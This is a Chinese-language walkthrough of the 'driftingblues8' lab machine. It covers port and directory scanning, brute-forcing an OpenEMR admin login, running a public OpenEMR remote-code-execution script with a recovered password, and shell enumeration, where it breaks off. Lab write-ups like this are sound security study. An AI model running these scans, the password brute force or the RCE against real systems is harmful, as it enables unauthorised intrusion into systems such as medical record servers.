{"id":544,"date":"2024-04-13T15:34:40","date_gmt":"2024-04-13T07:34:40","guid":{"rendered":"http:\/\/162.14.82.114\/?p=544"},"modified":"2024-04-13T15:34:40","modified_gmt":"2024-04-13T07:34:40","slug":"hmv-_-driftingblues8","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/544\/04\/13\/2024\/","title":{"rendered":"hmv[-_-]driftingblues8"},"content":{"rendered":"<h1>driftingblues8<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533062.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533062.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413142310719\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533064.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533064.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413142455026\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.7 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.7:80\n\nPORT   STATE SERVICE REASON  VERSION\n80\/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: 6CE8D3334381134EB0A89D8FECE6EEB2\n| http-title: OpenEMR Login\n|_Requested resource was interface\/login\/login.php?site=default\n|_http-server-header: Apache\/2.4.38 (Debian)<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.7 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">\/.php                 (Status: 403) [Size: 276]\n\/index.php            (Status: 302) [Size: 0] [--&gt; interface\/login\/login.php?site=default]\n\/images               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/images\/]\n\/templates            (Status: 301) [Size: 314] [--&gt; http:\/\/172.20.10.7\/templates\/]\n\/services             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/services\/]\n\/modules              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.7\/modules\/]\n\/common               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/common\/]\n\/library              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.7\/library\/]\n\/public               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/public\/]\n\/version.php          (Status: 200) [Size: 0]\n\/admin.php            (Status: 200) [Size: 937]\n\/portal               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/portal\/]\n\/tests                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.7\/tests\/]\n\/sites                (Status: 301) [Size: 310] [--&gt; 
http:\/\/172.20.10.7\/sites\/]\n\/custom               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/custom\/]\n\/contrib              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.7\/contrib\/]\n\/interface            (Status: 301) [Size: 314] [--&gt; http:\/\/172.20.10.7\/interface\/]\n\/vendor               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/vendor\/]\n\/config               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/config\/]\n\/setup.php            (Status: 200) [Size: 1214]\n\/Documentation        (Status: 301) [Size: 318] [--&gt; http:\/\/172.20.10.7\/Documentation\/]\n\/sql                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.7\/sql\/]\n\/controller.php       (Status: 200) [Size: 37]\n\/LICENSE              (Status: 200) [Size: 35147]\n\/ci                   (Status: 301) [Size: 307] [--&gt; http:\/\/172.20.10.7\/ci\/]\n\/cloud                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.7\/cloud\/]\n\/ccr                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.7\/ccr\/]\n\/patients             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/patients\/]\n\/repositories         (Status: 301) [Size: 317] [--&gt; http:\/\/172.20.10.7\/repositories\/]\n\/myportal             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/myportal\/]\n\/entities             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/entities\/]\n\/.php                 (Status: 403) [Size: 276]\n\/wordlist.txt         (Status: 200) [Size: 14394]\n\/controllers          (Status: 301) [Size: 316] [--&gt; http:\/\/172.20.10.7\/controllers\/]\n\/server-status        (Status: 403) [Size: 276]<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.7<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.7\n+ 
Target Hostname:    172.20.10.7\n+ Target Port:        80\n+ Start Time:         2024-04-13 02:26:39 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.38 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ Root page \/ redirects to: interface\/login\/login.php?site=default\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is &quot;127.0.1.1&quot;. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ Apache\/2.4.38 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/config\/: Directory indexing found.\n+ \/config\/: Configuration information may be available remotely.\n+ \/admin.php?en_log_id=0&amp;action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2006-5412\n+ \/admin.php?en_log_id=0&amp;action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. 
See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2006-5412\n+ \/admin.php: This might be interesting.\n+ \/library\/: Directory indexing found.\n+ \/library\/: This might be interesting.\n+ \/public\/: Directory indexing found.\n+ \/public\/: This might be interesting.\n+ \/services\/: Directory indexing found.\n+ \/sql\/: Directory indexing found.\n+ \/tests\/: Directory indexing found.\n+ \/tests\/: This might be interesting.\n+ \/images\/: Directory indexing found.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/ci\/: Directory indexing found.\n+ \/ci\/: This might be interesting: potential country code (C\u00d4te D&#039;ivoire).\n+ \/interface\/billing\/billing_process.php?srcdir=http:\/\/blog.cirt.net\/rfiinc.txt?: Cookie OpenEMR created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/sites\/: Directory indexing found.\n+ \/portal\/: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/composer.lock: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/.gitignore: .gitignore file found. 
It is possible to grasp the directory structure.\n+ \/README.md: Readme Found.\n+ 8102 requests: 0 error(s) and 27 item(s) reported on remote host\n+ End Time:           2024-04-13 02:27:07 (GMT-4) (28 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533065.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533065.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413142852045\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.7\/\/wordlist.txt<\/code><\/pre>\n<p>\u7ed9\u4e86\u4e00\u4e2a\u5b57\u5178\uff0c\u5148\u7ed9\u4ed6\u4fdd\u5b58\u4e00\u4e0b\uff0c\u540e\u9762\u4f30\u8ba1\u7206\u7834\u8981\u7528\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.7\/admin.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533066.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533066.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413143116951\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.7\/custom\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533067.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533067.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413143309914\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5\u7206\u7834<\/h3>\n<p>\u6293\u4e2a\u5305\u5148\uff1a\uff08\u600e\u4e48\u611f\u89c9\u6709\u70b9\u8033\u719f\uff0c\u5b59\u5427\u7528\u6237\u7684\u8b66\u89c9\uff09<\/p>\n<pre><code class=\"language-bash\">POST \/interface\/main\/main_screen.php?auth=login&amp;site=default HTTP\/1.1\nHost: 172.20.10.7\nContent-Length: 102\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/172.20.10.7\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: 
http:\/\/172.20.10.7\/interface\/login\/login.php?site=default\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nnew_login_session_management=1&amp;authProvider=Default&amp;authUser=admin&amp;clearPass=password&amp;languageChoice=1<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\uff0c\u672c\u6765\u6211\u5c1d\u8bd5hydra\u7684\uff0c\u4f46\u662f\u6ca1\u6709\u8c03\u51fa\u6765\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533068.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533068.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413144937314\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533069.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533069.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145052311\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u627e\u5230\u5bc6\u7801\uff01<\/p>\n<pre><code class=\"language-apl\">admin\n.:.yarrak.:.31<\/code><\/pre>\n<p>\u7136\u540e\u8fdb\u6765\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533070.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533070.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145153212\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u6709\u65e0\u4e0a\u4f20\u5165\u53e3\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533071.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533071.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145256040\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533072.png'><img class=\"lazyload 
lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533072.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145314383\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u597d\u50cf\u4e0d\u592a\u9614\u4ee5\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533073.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533073.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145527419\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u641c\u96c6\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff0c\u4e4b\u524d\u654f\u611f\u76ee\u5f55\u770b\u5230\u5176\u7248\u672c\u4e3a\uff1a<code>5.0.1(3)<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533074.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533074.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145650948\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ python2 45161.py -u admin -p .:.yarrak.:.31 -c whoami http:\/\/172.20.10.7\n .---.  ,---.  ,---.  .-. .-.,---.          ,---.    \n\/ .-. ) | .-.\\ | .-&#039;  |  \\| || .-&#039;  |\\    \/|| .-.\\   \n| | |(_)| |-&#039; )| `-.  |   | || `-.  |(\\  \/ || `-&#039;\/   \n| | | | | |--&#039; | .-&#039;  | |\\  || .-&#039;  (_)\\\/  ||   (    \n\\ `-&#039; \/ | |    |  `--.| | |)||  `--.| \\  \/ || |\\ \\   \n )---&#039;  \/(     \/( __.&#039;\/(  (_)\/( __.&#039;| |\\\/| ||_| \\)\\  \n(_)    (__)   (__)   (__)   (__)    &#039;-&#039;  &#039;-&#039;    (__) \n\n   ={   P R O J E C T    I N S E C U R I T Y   }=    \n\n         Twitter : @Insecurity                       \n         Site    : insecurity.sh                     \n\n[$] Authenticating with admin:.:.yarrak.:.31\n[$] Injecting payload\n[$] Payload executed<\/code><\/pre>\n<p>\u989d\uff0c\u4e0d\u77e5\u9053\u6267\u884c\u6210\u529f\u6ca1\u6709\u554a\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\u8bd5\u8bd5\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533075.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533075.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413150429744\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533076.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533076.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413150438087\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ sudo -l\nbash: sudo: command not found\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ ls -la\ntotal 252\ndrwxrwxrwx 11 www-data www-data  4096 May 28  2018 .\ndrwxrwxrwx 32 www-data www-data  4096 May 28  2018 ..\n-rwxrwxrwx  1 www-data www-data  6765 May 28  2018 about_page.php\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 authorizations\n-rwxrwxrwx  1 www-data www-data 27999 May 28  2018 backup.php\n-rwxrwxrwx  1 www-data www-data  2179 May 28  2018 backuplog.php\n-rwxrwxrwx  1 www-data www-data  1992 May 28  2018 backuplog.sh\n-rwxrwxrwx  1 www-data www-data   179 May 28  2018 blank.php\ndrwxrwxrwx  4 www-data www-data  4096 May 28  2018 calendar\n-rwxrwxrwx  1 
www-data www-data  2119 May 28  2018 daemon_frame.php\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 dated_reminders\n-rwxrwxrwx  1 www-data www-data 10495 May 28  2018 display_documents.php\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 exceptions\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 finder\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 holidays\n-rwxrwxrwx  1 www-data www-data 26027 May 28  2018 ippf_export.php\n-rwxrwxrwx  1 www-data www-data 84686 May 28  2018 left_nav.php\n-rwxrwxrwx  1 www-data www-data  3349 May 28  2018 main_info.php\n-rwxrwxrwx  1 www-data www-data  9783 May 28  2018 main_screen.php\n-rwxrwxrwx  1 www-data www-data  8399 May 28  2018 main_title.php\ndrwxrwxrwx  4 www-data www-data  4096 May 28  2018 messages\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 onotes\n-rwxrwxrwx  1 www-data www-data  3230 May 28  2018 pwd_expires_alert.php\ndrwxrwxrwx  5 www-data www-data  4096 May 28  2018 tabs\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ messages\/\nbash: messages\/: Is a directory\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ cd messages\/\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main\/messages$ ls\ncss  js  lab_results_messages.php  messages.php  print_postcards.php  save.php\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main\/messages$ cd ..\/..\/..\/\n(remote) www-data@driftingblues:\/var\/www\/html$ ls -la\ntotal 668\ndrwxrwxrwx 31 www-data www-data   4096 Apr 25  2021 .\ndrwxr-xr-x  3 root     root       